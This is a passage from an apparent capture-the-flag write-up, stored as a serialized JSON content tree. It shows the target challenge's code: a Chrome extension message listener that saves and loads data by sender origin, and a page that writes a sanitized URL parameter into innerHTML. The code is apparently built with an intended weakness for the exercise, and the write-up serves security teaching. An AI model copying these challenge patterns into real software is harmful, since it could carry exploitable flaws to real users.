sendResponse",{"type":33,"tag":128,"props":13831,"children":13832},{"style":312},[13833],{"type":38,"value":2966},{"type":33,"tag":128,"props":13835,"children":13836},{"style":312},[13837],{"type":38,"value":5625},{"type":33,"tag":128,"props":13839,"children":13840},{"style":312},[13841],{"type":38,"value":762},{"type":33,"tag":128,"props":13843,"children":13844},{"class":130,"line":1263},[13845,13850,13854,13858,13863,13867,13871],{"type":33,"tag":128,"props":13846,"children":13847},{"style":300},[13848],{"type":38,"value":13849},"  new",{"type":33,"tag":128,"props":13851,"children":13852},{"style":437},[13853],{"type":38,"value":13066},{"type":33,"tag":128,"props":13855,"children":13856},{"style":312},[13857],{"type":38,"value":5566},{"type":33,"tag":128,"props":13859,"children":13860},{"style":300},[13861],{"type":38,"value":13862},"async",{"type":33,"tag":128,"props":13864,"children":13865},{"style":312},[13866],{"type":38,"value":13259},{"type":33,"tag":128,"props":13868,"children":13869},{"style":312},[13870],{"type":38,"value":5625},{"type":33,"tag":128,"props":13872,"children":13873},{"style":312},[13874],{"type":38,"value":762},{"type":33,"tag":128,"props":13876,"children":13877},{"class":130,"line":1276},[13878,13882,13887,13891,13895,13900,13904,13909,13913,13918,13922,13927,13932,13936,13940,13944,13948,13953,13957,13962],{"type":33,"tag":128,"props":13879,"children":13880},{"style":300},[13881],{"type":38,"value":5696},{"type":33,"tag":128,"props":13883,"children":13884},{"style":306},[13885],{"type":38,"value":13886}," sender_origin",{"type":33,"tag":128,"props":13888,"children":13889},{"style":312},[13890],{"type":38,"value":5657},{"type":33,"tag":128,"props":13892,"children":13893},{"style":300},[13894],{"type":38,"value":13061},{"type":33,"tag":128,"props":13896,"children":13897},{"style":135},[13898],{"type":38,"value":13899}," 
URL",{"type":33,"tag":128,"props":13901,"children":13902},{"style":312},[13903],{"type":38,"value":5566},{"type":33,"tag":128,"props":13905,"children":13906},{"style":306},[13907],{"type":38,"value":13908},"sender",{"type":33,"tag":128,"props":13910,"children":13911},{"style":312},[13912],{"type":38,"value":215},{"type":33,"tag":128,"props":13914,"children":13915},{"style":306},[13916],{"type":38,"value":13917},"tab",{"type":33,"tag":128,"props":13919,"children":13920},{"style":312},[13921],{"type":38,"value":215},{"type":33,"tag":128,"props":13923,"children":13924},{"style":306},[13925],{"type":38,"value":13926},"pendingUrl",{"type":33,"tag":128,"props":13928,"children":13929},{"style":300},[13930],{"type":38,"value":13931}," ??",{"type":33,"tag":128,"props":13933,"children":13934},{"style":306},[13935],{"type":38,"value":13820},{"type":33,"tag":128,"props":13937,"children":13938},{"style":312},[13939],{"type":38,"value":215},{"type":33,"tag":128,"props":13941,"children":13942},{"style":306},[13943],{"type":38,"value":13917},{"type":33,"tag":128,"props":13945,"children":13946},{"style":312},[13947],{"type":38,"value":215},{"type":33,"tag":128,"props":13949,"children":13950},{"style":306},[13951],{"type":38,"value":13952},"url",{"type":33,"tag":128,"props":13954,"children":13955},{"style":312},[13956],{"type":38,"value":6700},{"type":33,"tag":128,"props":13958,"children":13959},{"style":306},[13960],{"type":38,"value":13961},"origin",{"type":33,"tag":128,"props":13963,"children":13964},{"style":312},[13965],{"type":38,"value":5676},{"type":33,"tag":128,"props":13967,"children":13968},{"class":130,"line":1288},[13969,13973,13977,13981,13985,13989,13994,13998,14002,14006],{"type":33,"tag":128,"props":13970,"children":13971},{"style":306},[13972],{"type":38,"value":6880},{"type":33,"tag":128,"props":13974,"children":13975},{"style":312},[13976],{"type":38,"value":215},{"type":33,"tag":128,"props":13978,"children":13979},{"style":135},[13980],{"type":38,"value":13157},{
"type":33,"tag":128,"props":13982,"children":13983},{"style":312},[13984],{"type":38,"value":5566},{"type":33,"tag":128,"props":13986,"children":13987},{"style":676},[13988],{"type":38,"value":669},{"type":33,"tag":128,"props":13990,"children":13991},{"style":140},[13992],{"type":38,"value":13993},"Sender Origin: ",{"type":33,"tag":128,"props":13995,"children":13996},{"style":676},[13997],{"type":38,"value":669},{"type":33,"tag":128,"props":13999,"children":14000},{"style":312},[14001],{"type":38,"value":5584},{"type":33,"tag":128,"props":14003,"children":14004},{"style":306},[14005],{"type":38,"value":13886},{"type":33,"tag":128,"props":14007,"children":14008},{"style":312},[14009],{"type":38,"value":5815},{"type":33,"tag":128,"props":14011,"children":14012},{"class":130,"line":1300},[14013,14017,14021,14025,14029,14033,14038,14042,14046,14051],{"type":33,"tag":128,"props":14014,"children":14015},{"style":306},[14016],{"type":38,"value":6880},{"type":33,"tag":128,"props":14018,"children":14019},{"style":312},[14020],{"type":38,"value":215},{"type":33,"tag":128,"props":14022,"children":14023},{"style":135},[14024],{"type":38,"value":13157},{"type":33,"tag":128,"props":14026,"children":14027},{"style":312},[14028],{"type":38,"value":5566},{"type":33,"tag":128,"props":14030,"children":14031},{"style":676},[14032],{"type":38,"value":669},{"type":33,"tag":128,"props":14034,"children":14035},{"style":140},[14036],{"type":38,"value":14037},"Request: ",{"type":33,"tag":128,"props":14039,"children":14040},{"style":676},[14041],{"type":38,"value":669},{"type":33,"tag":128,"props":14043,"children":14044},{"style":312},[14045],{"type":38,"value":5584},{"type":33,"tag":128,"props":14047,"children":14048},{"style":306},[14049],{"type":38,"value":14050}," 
request",{"type":33,"tag":128,"props":14052,"children":14053},{"style":312},[14054],{"type":38,"value":5815},{"type":33,"tag":128,"props":14056,"children":14057},{"class":130,"line":1313},[14058,14062,14066,14070,14074,14079,14083,14087,14092,14096,14100],{"type":33,"tag":128,"props":14059,"children":14060},{"style":1576},[14061],{"type":38,"value":6625},{"type":33,"tag":128,"props":14063,"children":14064},{"style":312},[14065],{"type":38,"value":2852},{"type":33,"tag":128,"props":14067,"children":14068},{"style":306},[14069],{"type":38,"value":13811},{"type":33,"tag":128,"props":14071,"children":14072},{"style":312},[14073],{"type":38,"value":215},{"type":33,"tag":128,"props":14075,"children":14076},{"style":306},[14077],{"type":38,"value":14078},"type",{"type":33,"tag":128,"props":14080,"children":14081},{"style":300},[14082],{"type":38,"value":13595},{"type":33,"tag":128,"props":14084,"children":14085},{"style":676},[14086],{"type":38,"value":679},{"type":33,"tag":128,"props":14088,"children":14089},{"style":140},[14090],{"type":38,"value":14091},"SAVE",{"type":33,"tag":128,"props":14093,"children":14094},{"style":676},[14095],{"type":38,"value":669},{"type":33,"tag":128,"props":14097,"children":14098},{"style":312},[14099],{"type":38,"value":2966},{"type":33,"tag":128,"props":14101,"children":14102},{"style":312},[14103],{"type":38,"value":762},{"type":33,"tag":128,"props":14105,"children":14106},{"class":130,"line":1327},[14107,14112,14116,14120,14124,14128,14132,14136,14140,14144,14148,14152,14156,14161,14165,14169],{"type":33,"tag":128,"props":14108,"children":14109},{"style":135},[14110],{"type":38,"value":14111},"      
save",{"type":33,"tag":128,"props":14113,"children":14114},{"style":312},[14115],{"type":38,"value":5566},{"type":33,"tag":128,"props":14117,"children":14118},{"style":306},[14119],{"type":38,"value":13811},{"type":33,"tag":128,"props":14121,"children":14122},{"style":312},[14123],{"type":38,"value":215},{"type":33,"tag":128,"props":14125,"children":14126},{"style":306},[14127],{"type":38,"value":11139},{"type":33,"tag":128,"props":14129,"children":14130},{"style":312},[14131],{"type":38,"value":215},{"type":33,"tag":128,"props":14133,"children":14134},{"style":306},[14135],{"type":38,"value":13022},{"type":33,"tag":128,"props":14137,"children":14138},{"style":312},[14139],{"type":38,"value":5584},{"type":33,"tag":128,"props":14141,"children":14142},{"style":306},[14143],{"type":38,"value":14050},{"type":33,"tag":128,"props":14145,"children":14146},{"style":312},[14147],{"type":38,"value":215},{"type":33,"tag":128,"props":14149,"children":14150},{"style":306},[14151],{"type":38,"value":11139},{"type":33,"tag":128,"props":14153,"children":14154},{"style":312},[14155],{"type":38,"value":215},{"type":33,"tag":128,"props":14157,"children":14158},{"style":306},[14159],{"type":38,"value":14160},"value",{"type":33,"tag":128,"props":14162,"children":14163},{"style":312},[14164],{"type":38,"value":5584},{"type":33,"tag":128,"props":14166,"children":14167},{"style":306},[14168],{"type":38,"value":13886},{"type":33,"tag":128,"props":14170,"children":14171},{"style":312},[14172],{"type":38,"value":2427},{"type":33,"tag":128,"props":14174,"children":14175},{"class":130,"line":11196},[14176,14181,14186,14190,14195,14199,14203,14207,14211],{"type":33,"tag":128,"props":14177,"children":14178},{"style":312},[14179],{"type":38,"value":14180},"        
.",{"type":33,"tag":128,"props":14182,"children":14183},{"style":135},[14184],{"type":38,"value":14185},"then",{"type":33,"tag":128,"props":14187,"children":14188},{"style":312},[14189],{"type":38,"value":5566},{"type":33,"tag":128,"props":14191,"children":14192},{"style":306},[14193],{"type":38,"value":14194},"response",{"type":33,"tag":128,"props":14196,"children":14197},{"style":312},[14198],{"type":38,"value":5625},{"type":33,"tag":128,"props":14200,"children":14201},{"style":135},[14202],{"type":38,"value":13829},{"type":33,"tag":128,"props":14204,"children":14205},{"style":312},[14206],{"type":38,"value":5566},{"type":33,"tag":128,"props":14208,"children":14209},{"style":306},[14210],{"type":38,"value":14194},{"type":33,"tag":128,"props":14212,"children":14213},{"style":312},[14214],{"type":38,"value":2459},{"type":33,"tag":128,"props":14216,"children":14217},{"class":130,"line":11204},[14218,14222,14227,14231,14235,14239,14243,14247,14252],{"type":33,"tag":128,"props":14219,"children":14220},{"style":312},[14221],{"type":38,"value":14180},{"type":33,"tag":128,"props":14223,"children":14224},{"style":135},[14225],{"type":38,"value":14226},"catch",{"type":33,"tag":128,"props":14228,"children":14229},{"style":312},[14230],{"type":38,"value":5566},{"type":33,"tag":128,"props":14232,"children":14233},{"style":306},[14234],{"type":38,"value":6889},{"type":33,"tag":128,"props":14236,"children":14237},{"style":312},[14238],{"type":38,"value":5625},{"type":33,"tag":128,"props":14240,"children":14241},{"style":135},[14242],{"type":38,"value":13829},{"type":33,"tag":128,"props":14244,"children":14245},{"style":312},[14246],{"type":38,"value":5836},{"type":33,"tag":128,"props":14248,"children":14249},{"style":306},[14250],{"type":38,"value":14251}," error",{"type":33,"tag":128,"props":14253,"children":14254},{"style":312},[14255],{"type":38,"value":14256}," 
}));\n",{"type":33,"tag":128,"props":14258,"children":14259},{"class":130,"line":11213},[14260,14265,14270,14275,14279,14283,14287,14291,14295,14299,14304,14308,14312],{"type":33,"tag":128,"props":14261,"children":14262},{"style":312},[14263],{"type":38,"value":14264},"    }",{"type":33,"tag":128,"props":14266,"children":14267},{"style":1576},[14268],{"type":38,"value":14269}," else",{"type":33,"tag":128,"props":14271,"children":14272},{"style":1576},[14273],{"type":38,"value":14274}," if",{"type":33,"tag":128,"props":14276,"children":14277},{"style":312},[14278],{"type":38,"value":2852},{"type":33,"tag":128,"props":14280,"children":14281},{"style":306},[14282],{"type":38,"value":13811},{"type":33,"tag":128,"props":14284,"children":14285},{"style":312},[14286],{"type":38,"value":215},{"type":33,"tag":128,"props":14288,"children":14289},{"style":306},[14290],{"type":38,"value":14078},{"type":33,"tag":128,"props":14292,"children":14293},{"style":300},[14294],{"type":38,"value":13595},{"type":33,"tag":128,"props":14296,"children":14297},{"style":676},[14298],{"type":38,"value":679},{"type":33,"tag":128,"props":14300,"children":14301},{"style":140},[14302],{"type":38,"value":14303},"LOAD",{"type":33,"tag":128,"props":14305,"children":14306},{"style":676},[14307],{"type":38,"value":669},{"type":33,"tag":128,"props":14309,"children":14310},{"style":312},[14311],{"type":38,"value":2966},{"type":33,"tag":128,"props":14313,"children":14314},{"style":312},[14315],{"type":38,"value":762},{"type":33,"tag":128,"props":14317,"children":14318},{"class":130,"line":11250},[14319,14324,14328,14332,14336,14340,14344,14348,14352,14356],{"type":33,"tag":128,"props":14320,"children":14321},{"style":135},[14322],{"type":38,"value":14323},"      
load",{"type":33,"tag":128,"props":14325,"children":14326},{"style":312},[14327],{"type":38,"value":5566},{"type":33,"tag":128,"props":14329,"children":14330},{"style":306},[14331],{"type":38,"value":13811},{"type":33,"tag":128,"props":14333,"children":14334},{"style":312},[14335],{"type":38,"value":215},{"type":33,"tag":128,"props":14337,"children":14338},{"style":306},[14339],{"type":38,"value":11139},{"type":33,"tag":128,"props":14341,"children":14342},{"style":312},[14343],{"type":38,"value":215},{"type":33,"tag":128,"props":14345,"children":14346},{"style":306},[14347],{"type":38,"value":13022},{"type":33,"tag":128,"props":14349,"children":14350},{"style":312},[14351],{"type":38,"value":5584},{"type":33,"tag":128,"props":14353,"children":14354},{"style":306},[14355],{"type":38,"value":13886},{"type":33,"tag":128,"props":14357,"children":14358},{"style":312},[14359],{"type":38,"value":2427},{"type":33,"tag":128,"props":14361,"children":14362},{"class":130,"line":11270},[14363,14367,14371,14375,14379,14383,14387,14391,14395],{"type":33,"tag":128,"props":14364,"children":14365},{"style":312},[14366],{"type":38,"value":14180},{"type":33,"tag":128,"props":14368,"children":14369},{"style":135},[14370],{"type":38,"value":14185},{"type":33,"tag":128,"props":14372,"children":14373},{"style":312},[14374],{"type":38,"value":5566},{"type":33,"tag":128,"props":14376,"children":14377},{"style":306},[14378],{"type":38,"value":14194},{"type":33,"tag":128,"props":14380,"children":14381},{"style":312},[14382],{"type":38,"value":5625},{"type":33,"tag":128,"props":14384,"children":14385},{"style":135},[14386],{"type":38,"value":13829},{"type":33,"tag":128,"props":14388,"children":14389},{"style":312},[14390],{"type":38,"value":5566},{"type":33,"tag":128,"props":14392,"children":14393},{"style":306},[14394],{"type":38,"value":14194},{"type":33,"tag":128,"props":14396,"children":14397},{"style":312},[14398],{"type":38,"value":2459},{"type":33,"tag":128,"props":14400,"children":14401
},{"class":130,"line":11278},[14402,14406,14410,14414,14418,14422,14426,14430,14434],{"type":33,"tag":128,"props":14403,"children":14404},{"style":312},[14405],{"type":38,"value":14180},{"type":33,"tag":128,"props":14407,"children":14408},{"style":135},[14409],{"type":38,"value":14226},{"type":33,"tag":128,"props":14411,"children":14412},{"style":312},[14413],{"type":38,"value":5566},{"type":33,"tag":128,"props":14415,"children":14416},{"style":306},[14417],{"type":38,"value":6889},{"type":33,"tag":128,"props":14419,"children":14420},{"style":312},[14421],{"type":38,"value":5625},{"type":33,"tag":128,"props":14423,"children":14424},{"style":135},[14425],{"type":38,"value":13829},{"type":33,"tag":128,"props":14427,"children":14428},{"style":312},[14429],{"type":38,"value":5836},{"type":33,"tag":128,"props":14431,"children":14432},{"style":306},[14433],{"type":38,"value":14251},{"type":33,"tag":128,"props":14435,"children":14436},{"style":312},[14437],{"type":38,"value":14256},{"type":33,"tag":128,"props":14439,"children":14440},{"class":130,"line":11334},[14441],{"type":33,"tag":128,"props":14442,"children":14443},{"style":312},[14444],{"type":38,"value":6760},{"type":33,"tag":128,"props":14446,"children":14447},{"class":130,"line":11375},[14448],{"type":33,"tag":128,"props":14449,"children":14450},{"style":312},[14451],{"type":38,"value":13321},{"type":33,"tag":128,"props":14453,"children":14454},{"class":130,"line":11383},[14455,14459,14463],{"type":33,"tag":128,"props":14456,"children":14457},{"style":1576},[14458],{"type":38,"value":13056},{"type":33,"tag":128,"props":14460,"children":14461},{"style":1576},[14462],{"type":38,"value":5850},{"type":33,"tag":128,"props":14464,"children":14465},{"style":312},[14466],{"type":38,"value":5676},{"type":33,"tag":128,"props":14468,"children":14469},{"class":130,"line":11392},[14470],{"type":33,"tag":128,"props":14471,"children":14472},{"style":312},[14473],{"type":38,"value":5902},{"type":33,"tag":47,"props":14475,"childre
n":14476},{},[14477,14479,14485],{"type":38,"value":14478},"We can see the call to the function ",{"type":33,"tag":105,"props":14480,"children":14482},{"className":14481},[],[14483],{"type":38,"value":14484},"chrome.runtime.onMessage.addListener",{"type":38,"value":14486}," which will listen for incoming messages.",{"type":33,"tag":47,"props":14488,"children":14489},{},[14490,14492,14497,14498,14503],{"type":38,"value":14491},"Depending on the event ",{"type":33,"tag":105,"props":14493,"children":14495},{"className":14494},[],[14496],{"type":38,"value":14091},{"type":38,"value":6361},{"type":33,"tag":105,"props":14499,"children":14501},{"className":14500},[],[14502],{"type":38,"value":14303},{"type":38,"value":14504},", a different code path is taken.",{"type":33,"tag":88,"props":14506,"children":14508},{"id":14507},"chrome-api",[14509],{"type":38,"value":14510},"Chrome API",{"type":33,"tag":47,"props":14512,"children":14513},{},[14514],{"type":38,"value":14515},"Chrome extensions (and most other modern browser extensions) use the WebExtensions API, a standardized API that gives access to browser tabs, cookies, history, storage, and more.",{"type":33,"tag":47,"props":14517,"children":14518},{},[14519],{"type":38,"value":14520},"As seen in the previous chapter, the background script calls the chrome object, which interacts with the extension's local storage using chrome.storage.local.",{"type":33,"tag":40,"props":14522,"children":14524},{"id":14523},"foothold-and-defintion-of-the-assets",[14525],{"type":38,"value":14526},"Foothold and definition of the assets",{"type":33,"tag":81,"props":14528,"children":14530},{"id":14529},"web-service",[14531],{"type":38,"value":14532},"Web service:",{"type":33,"tag":47,"props":14534,"children":14535},{},[14536],{"type":38,"value":14537},"The web service is a simple page with a text input and a display 
below.",{"type":33,"tag":75,"props":14539,"children":14542},{"imgSrc":14540,":width":14541},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731266140/writeups/shikanoko/webapp_chrome.webp","450",[],{"type":33,"tag":114,"props":14544,"children":14545},{"lang":5929},[14546],{"type":33,"tag":119,"props":14547,"children":14549},{"className":5933,"code":14548,"language":5929,"meta":8,"style":8},"\u003C!DOCTYPE html>\n\u003Chtml lang=\"en\">\n\n\u003Chead>\n    \u003Cmeta charset=\"UTF-8\">\n    \u003Cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n    \u003Ctitle>Shinanoko Website\u003C/title>\n\u003C/head>\n\n\u003Cbody>\n    \u003Ch1>Berotak Nokotan\u003C/h1>\n    \u003Cform action=\"/\">\n        \u003Cinput type=\"text\" name=\"html\" placeholder=\"Enter HTML content\">\n        \u003Cinput type=\"submit\">\n    \u003C/form>\n\n    \u003Cdiv class=\"output\">\u003C/div>\n    \u003Cscript src=\"https://unpkg.com/dompurify@latest/dist/purify.min.js\">\u003C/script>\n    \u003Cscript>\n        const url = new URL(location.href);\n        const html = url.searchParams.get('html');\n        if (html) {\n            document.querySelector('.output').innerHTML = DOMPurify.sanitize(html);\n        }\n    \u003C/script>\n\u003C/body>\n\n\u003C/html>\n\n",[14550],{"type":33,"tag":105,"props":14551,"children":14552},{"__ignoreMap":8},[14553,14575,14612,14619,14635,14673,14732,14764,14779,14786,14801,14833,14870,14950,14986,15002,15009,15053,15099,15114,15160,15216,15240,15311,15319,15334,15349,15356],{"type":33,"tag":128,"props":14554,"children":14555},{"class":130,"line":131},[14556,14561,14566,14571],{"type":33,"tag":128,"props":14557,"children":14558},{"style":312},[14559],{"type":38,"value":14560},"\u003C!",{"type":33,"tag":128,"props":14562,"children":14563},{"style":1576},[14564],{"type":38,"value":14565},"DOCTYPE",{"type":33,"tag":128,"props":14567,"children":14568},{"style":306},[14569],{"type":38,"value":14570}," 
html",{"type":33,"tag":128,"props":14572,"children":14573},{"style":312},[14574],{"type":38,"value":6097},{"type":33,"tag":128,"props":14576,"children":14577},{"class":130,"line":362},[14578,14582,14586,14591,14595,14599,14604,14608],{"type":33,"tag":128,"props":14579,"children":14580},{"style":312},[14581],{"type":38,"value":5977},{"type":33,"tag":128,"props":14583,"children":14584},{"style":1576},[14585],{"type":38,"value":5929},{"type":33,"tag":128,"props":14587,"children":14588},{"style":306},[14589],{"type":38,"value":14590}," lang",{"type":33,"tag":128,"props":14592,"children":14593},{"style":312},[14594],{"type":38,"value":315},{"type":33,"tag":128,"props":14596,"children":14597},{"style":676},[14598],{"type":38,"value":669},{"type":33,"tag":128,"props":14600,"children":14601},{"style":140},[14602],{"type":38,"value":14603},"en",{"type":33,"tag":128,"props":14605,"children":14606},{"style":676},[14607],{"type":38,"value":669},{"type":33,"tag":128,"props":14609,"children":14610},{"style":312},[14611],{"type":38,"value":6097},{"type":33,"tag":128,"props":14613,"children":14614},{"class":130,"line":403},[14615],{"type":33,"tag":128,"props":14616,"children":14617},{"emptyLinePlaceholder":896},[14618],{"type":38,"value":899},{"type":33,"tag":128,"props":14620,"children":14621},{"class":130,"line":739},[14622,14626,14631],{"type":33,"tag":128,"props":14623,"children":14624},{"style":312},[14625],{"type":38,"value":5977},{"type":33,"tag":128,"props":14627,"children":14628},{"style":1576},[14629],{"type":38,"value":14630},"head",{"type":33,"tag":128,"props":14632,"children":14633},{"style":312},[14634],{"type":38,"value":6097},{"type":33,"tag":128,"props":14636,"children":14637},{"class":130,"line":765},[14638,14642,14647,14652,14656,14660,14665,14669],{"type":33,"tag":128,"props":14639,"children":14640},{"style":312},[14641],{"type":38,"value":6105},{"type":33,"tag":128,"props":14643,"children":14644},{"style":1576},[14645],{"type":38,"value":14646},"meta",{"type":3
3,"tag":128,"props":14648,"children":14649},{"style":306},[14650],{"type":38,"value":14651}," charset",{"type":33,"tag":128,"props":14653,"children":14654},{"style":312},[14655],{"type":38,"value":315},{"type":33,"tag":128,"props":14657,"children":14658},{"style":676},[14659],{"type":38,"value":669},{"type":33,"tag":128,"props":14661,"children":14662},{"style":140},[14663],{"type":38,"value":14664},"UTF-8",{"type":33,"tag":128,"props":14666,"children":14667},{"style":676},[14668],{"type":38,"value":669},{"type":33,"tag":128,"props":14670,"children":14671},{"style":312},[14672],{"type":38,"value":6097},{"type":33,"tag":128,"props":14674,"children":14675},{"class":130,"line":804},[14676,14680,14684,14689,14693,14697,14702,14706,14711,14715,14719,14724,14728],{"type":33,"tag":128,"props":14677,"children":14678},{"style":312},[14679],{"type":38,"value":6105},{"type":33,"tag":128,"props":14681,"children":14682},{"style":1576},[14683],{"type":38,"value":14646},{"type":33,"tag":128,"props":14685,"children":14686},{"style":306},[14687],{"type":38,"value":14688}," name",{"type":33,"tag":128,"props":14690,"children":14691},{"style":312},[14692],{"type":38,"value":315},{"type":33,"tag":128,"props":14694,"children":14695},{"style":676},[14696],{"type":38,"value":669},{"type":33,"tag":128,"props":14698,"children":14699},{"style":140},[14700],{"type":38,"value":14701},"viewport",{"type":33,"tag":128,"props":14703,"children":14704},{"style":676},[14705],{"type":38,"value":669},{"type":33,"tag":128,"props":14707,"children":14708},{"style":306},[14709],{"type":38,"value":14710}," content",{"type":33,"tag":128,"props":14712,"children":14713},{"style":312},[14714],{"type":38,"value":315},{"type":33,"tag":128,"props":14716,"children":14717},{"style":676},[14718],{"type":38,"value":669},{"type":33,"tag":128,"props":14720,"children":14721},{"style":140},[14722],{"type":38,"value":14723},"width=device-width, 
initial-scale=1.0",{"type":33,"tag":128,"props":14725,"children":14726},{"style":676},[14727],{"type":38,"value":669},{"type":33,"tag":128,"props":14729,"children":14730},{"style":312},[14731],{"type":38,"value":6097},{"type":33,"tag":128,"props":14733,"children":14734},{"class":130,"line":839},[14735,14739,14743,14747,14752,14756,14760],{"type":33,"tag":128,"props":14736,"children":14737},{"style":312},[14738],{"type":38,"value":6105},{"type":33,"tag":128,"props":14740,"children":14741},{"style":1576},[14742],{"type":38,"value":776},{"type":33,"tag":128,"props":14744,"children":14745},{"style":312},[14746],{"type":38,"value":6054},{"type":33,"tag":128,"props":14748,"children":14749},{"style":323},[14750],{"type":38,"value":14751},"Shinanoko Website",{"type":33,"tag":128,"props":14753,"children":14754},{"style":312},[14755],{"type":38,"value":6190},{"type":33,"tag":128,"props":14757,"children":14758},{"style":1576},[14759],{"type":38,"value":776},{"type":33,"tag":128,"props":14761,"children":14762},{"style":312},[14763],{"type":38,"value":6097},{"type":33,"tag":128,"props":14765,"children":14766},{"class":130,"line":848},[14767,14771,14775],{"type":33,"tag":128,"props":14768,"children":14769},{"style":312},[14770],{"type":38,"value":6190},{"type":33,"tag":128,"props":14772,"children":14773},{"style":1576},[14774],{"type":38,"value":14630},{"type":33,"tag":128,"props":14776,"children":14777},{"style":312},[14778],{"type":38,"value":6097},{"type":33,"tag":128,"props":14780,"children":14781},{"class":130,"line":976},[14782],{"type":33,"tag":128,"props":14783,"children":14784},{"emptyLinePlaceholder":896},[14785],{"type":38,"value":899},{"type":33,"tag":128,"props":14787,"children":14788},{"class":130,"line":988},[14789,14793,14797],{"type":33,"tag":128,"props":14790,"children":14791},{"style":312},[14792],{"type":38,"value":5977},{"type":33,"tag":128,"props":14794,"children":14795},{"style":1576},[14796],{"type":38,"value":5671},{"type":33,"tag":128,"props":14798,"chil
dren":14799},{"style":312},[14800],{"type":38,"value":6097},{"type":33,"tag":128,"props":14802,"children":14803},{"class":130,"line":1001},[14804,14808,14812,14816,14821,14825,14829],{"type":33,"tag":128,"props":14805,"children":14806},{"style":312},[14807],{"type":38,"value":6105},{"type":33,"tag":128,"props":14809,"children":14810},{"style":1576},[14811],{"type":38,"value":34},{"type":33,"tag":128,"props":14813,"children":14814},{"style":312},[14815],{"type":38,"value":6054},{"type":33,"tag":128,"props":14817,"children":14818},{"style":323},[14819],{"type":38,"value":14820},"Berotak Nokotan",{"type":33,"tag":128,"props":14822,"children":14823},{"style":312},[14824],{"type":38,"value":6190},{"type":33,"tag":128,"props":14826,"children":14827},{"style":1576},[14828],{"type":38,"value":34},{"type":33,"tag":128,"props":14830,"children":14831},{"style":312},[14832],{"type":38,"value":6097},{"type":33,"tag":128,"props":14834,"children":14835},{"class":130,"line":1014},[14836,14840,14845,14850,14854,14858,14862,14866],{"type":33,"tag":128,"props":14837,"children":14838},{"style":312},[14839],{"type":38,"value":6105},{"type":33,"tag":128,"props":14841,"children":14842},{"style":1576},[14843],{"type":38,"value":14844},"form",{"type":33,"tag":128,"props":14846,"children":14847},{"style":306},[14848],{"type":38,"value":14849}," 
action",{"type":33,"tag":128,"props":14851,"children":14852},{"style":312},[14853],{"type":38,"value":315},{"type":33,"tag":128,"props":14855,"children":14856},{"style":676},[14857],{"type":38,"value":669},{"type":33,"tag":128,"props":14859,"children":14860},{"style":140},[14861],{"type":38,"value":7367},{"type":33,"tag":128,"props":14863,"children":14864},{"style":676},[14865],{"type":38,"value":669},{"type":33,"tag":128,"props":14867,"children":14868},{"style":312},[14869],{"type":38,"value":6097},{"type":33,"tag":128,"props":14871,"children":14872},{"class":130,"line":1026},[14873,14878,14883,14888,14892,14896,14900,14904,14908,14912,14916,14920,14924,14929,14933,14937,14942,14946],{"type":33,"tag":128,"props":14874,"children":14875},{"style":312},[14876],{"type":38,"value":14877},"        \u003C",{"type":33,"tag":128,"props":14879,"children":14880},{"style":1576},[14881],{"type":38,"value":14882},"input",{"type":33,"tag":128,"props":14884,"children":14885},{"style":306},[14886],{"type":38,"value":14887}," 
type",{"type":33,"tag":128,"props":14889,"children":14890},{"style":312},[14891],{"type":38,"value":315},{"type":33,"tag":128,"props":14893,"children":14894},{"style":676},[14895],{"type":38,"value":669},{"type":33,"tag":128,"props":14897,"children":14898},{"style":140},[14899],{"type":38,"value":38},{"type":33,"tag":128,"props":14901,"children":14902},{"style":676},[14903],{"type":38,"value":669},{"type":33,"tag":128,"props":14905,"children":14906},{"style":306},[14907],{"type":38,"value":14688},{"type":33,"tag":128,"props":14909,"children":14910},{"style":312},[14911],{"type":38,"value":315},{"type":33,"tag":128,"props":14913,"children":14914},{"style":676},[14915],{"type":38,"value":669},{"type":33,"tag":128,"props":14917,"children":14918},{"style":140},[14919],{"type":38,"value":5929},{"type":33,"tag":128,"props":14921,"children":14922},{"style":676},[14923],{"type":38,"value":669},{"type":33,"tag":128,"props":14925,"children":14926},{"style":306},[14927],{"type":38,"value":14928}," placeholder",{"type":33,"tag":128,"props":14930,"children":14931},{"style":312},[14932],{"type":38,"value":315},{"type":33,"tag":128,"props":14934,"children":14935},{"style":676},[14936],{"type":38,"value":669},{"type":33,"tag":128,"props":14938,"children":14939},{"style":140},[14940],{"type":38,"value":14941},"Enter HTML 
content",{"type":33,"tag":128,"props":14943,"children":14944},{"style":676},[14945],{"type":38,"value":669},{"type":33,"tag":128,"props":14947,"children":14948},{"style":312},[14949],{"type":38,"value":6097},{"type":33,"tag":128,"props":14951,"children":14952},{"class":130,"line":1038},[14953,14957,14961,14965,14969,14973,14978,14982],{"type":33,"tag":128,"props":14954,"children":14955},{"style":312},[14956],{"type":38,"value":14877},{"type":33,"tag":128,"props":14958,"children":14959},{"style":1576},[14960],{"type":38,"value":14882},{"type":33,"tag":128,"props":14962,"children":14963},{"style":306},[14964],{"type":38,"value":14887},{"type":33,"tag":128,"props":14966,"children":14967},{"style":312},[14968],{"type":38,"value":315},{"type":33,"tag":128,"props":14970,"children":14971},{"style":676},[14972],{"type":38,"value":669},{"type":33,"tag":128,"props":14974,"children":14975},{"style":140},[14976],{"type":38,"value":14977},"submit",{"type":33,"tag":128,"props":14979,"children":14980},{"style":676},[14981],{"type":38,"value":669},{"type":33,"tag":128,"props":14983,"children":14984},{"style":312},[14985],{"type":38,"value":6097},{"type":33,"tag":128,"props":14987,"children":14988},{"class":130,"line":1051},[14989,14994,14998],{"type":33,"tag":128,"props":14990,"children":14991},{"style":312},[14992],{"type":38,"value":14993},"    
\u003C/",{"type":33,"tag":128,"props":14995,"children":14996},{"style":1576},[14997],{"type":38,"value":14844},{"type":33,"tag":128,"props":14999,"children":15000},{"style":312},[15001],{"type":38,"value":6097},{"type":33,"tag":128,"props":15003,"children":15004},{"class":130,"line":1063},[15005],{"type":33,"tag":128,"props":15006,"children":15007},{"emptyLinePlaceholder":896},[15008],{"type":38,"value":899},{"type":33,"tag":128,"props":15010,"children":15011},{"class":130,"line":1076},[15012,15016,15020,15024,15028,15032,15037,15041,15045,15049],{"type":33,"tag":128,"props":15013,"children":15014},{"style":312},[15015],{"type":38,"value":6105},{"type":33,"tag":128,"props":15017,"children":15018},{"style":1576},[15019],{"type":38,"value":5982},{"type":33,"tag":128,"props":15021,"children":15022},{"style":306},[15023],{"type":38,"value":6009},{"type":33,"tag":128,"props":15025,"children":15026},{"style":312},[15027],{"type":38,"value":315},{"type":33,"tag":128,"props":15029,"children":15030},{"style":676},[15031],{"type":38,"value":669},{"type":33,"tag":128,"prop